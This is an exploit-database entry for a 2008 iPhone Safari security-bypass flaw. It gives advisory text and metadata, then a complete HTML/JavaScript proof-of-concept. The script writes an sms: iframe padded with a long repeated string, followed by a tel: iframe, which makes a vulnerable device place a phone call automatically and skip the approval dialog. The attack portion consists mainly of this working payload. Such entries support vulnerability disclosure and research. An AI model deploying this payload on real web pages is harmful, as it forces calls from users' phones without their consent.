iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner

vendor:

iPhone and iPod touch

by:

Collin Mulliner

7.5

CVSS

HIGH

Security-Bypass Vulnerability

284

CWE

Product Name: iPhone and iPod touch

Affected Version From: iPhone and iPod touch Prior to Version 3.0

Affected Version To: iPhone and iPod touch Prior to Version 3.0

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner

Apple iPhone is prone to a security-bypass vulnerability that may cause a call to be placed automatically. Successfully exploiting this issue may allow attackers to bypass the Mail's call-approval dialog and place a call automatically from a vulnerable device. An attacker can exploit this issue by creating a malicious HTML page containing a specially crafted JavaScript code.

Mitigation:

Users should avoid visiting untrusted websites or following links provided by unknown or untrusted sources.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/35425/info
  
Apple iPhone is prone to a security-bypass vulnerability that may cause a call to be placed automatically.
  
Successfully exploiting this issue may allow attackers to bypass the Mail's call-approval dialog and place a call automatically from a vulnerable device.
  
NOTE: This issue was previously covered in BID 35414 (Apple iPhone and iPod touch Prior to Version 3.0 Multiple Vulnerabilities), but has been assigned its own record to better document it.
  
<html> <head> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner</title> </head> <body> <script lang=javascript> l = "<iframe src=\"sms:"; for (i = 0; i < 10000; i++) { l = l + "3340948034298232"; } l = l + "\" width=10 height=10></iframe><iframe src=\"tel:+12345\" height=10 width=10></iframe>"; document.write(l); </script> </body> </html>